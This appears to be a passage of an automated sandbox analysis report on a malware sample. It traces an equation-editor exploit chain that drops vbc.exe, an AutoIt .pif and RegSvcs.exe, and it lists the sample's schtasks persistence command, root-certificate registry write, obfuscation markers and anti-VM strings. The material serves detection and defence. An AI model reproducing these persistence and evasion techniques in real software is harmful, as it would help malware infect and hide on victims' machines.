Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00266D06 GetLastError,FormatMessageW, 4_2_00266D06
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 4_2_0027963A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.............p.......x.......H................................................................. ..... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: unknown Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_00FE33A3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01014AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 5_2_01014AEB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD47D.tmp Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0101E0F6 CoInitialize,CoCreateInstance,CoUninitialize, 5_2_0101E0F6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 5_2_0100D766
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle, 5_2_00FE3EC5
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}
Source: C:\Users\Public\vbc.exe Command line argument: ps* 4_2_0027CBB8
Source: C:\Users\Public\vbc.exe Command line argument: sfxname 4_2_0027CBB8
Source: C:\Users\Public\vbc.exe Command line argument: sfxstime 4_2_0027CBB8
Source: C:\Users\Public\vbc.exe Command line argument: STARTDLG 4_2_0027CBB8
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Data Obfuscation:

.NET source code contains potential unpacker
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E336 push ecx; ret 4_2_0027E349
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027D870 push eax; ret 4_2_0027D88E
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC6BD5 push ecx; ret 5_2_00FC6BE8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress, 5_2_00FBEE30
File is packed with WinRar
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4531298 Jump to behavior
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\33920049\mmuiqlcvwo.pif Jump to dropped file
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\33920049\mmuiqlcvwo.pif Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00FE43FF
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0102A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_0102A2EA
Stores large binary data to the registry
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Yara detected AntiVM autoit script
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620 Thread sleep count: 4838 > 30
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620 Thread sleep time: -48380s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620 Thread sleep count: 113 > 30
Source: C:\Windows\System32\taskeng.exe TID: 236 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580 Thread sleep count: 3937 > 30
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580 Thread sleep time: -39370s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580 Thread sleep count: 110 > 30
Sleep loop found (likely to delay execution)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Thread sleep count: Count: 4838 delay: -10
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Thread sleep count: Count: 3937 delay: -10
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Window / User API: threadDelayed 4838
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 7950
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 1761
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 749
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Window / User API: threadDelayed 3937
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: VMwaretray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe_
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: VMwareUser.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenAq
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") ThenD6
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenfMf
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: VboxService.exex
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: VMwareService.exe
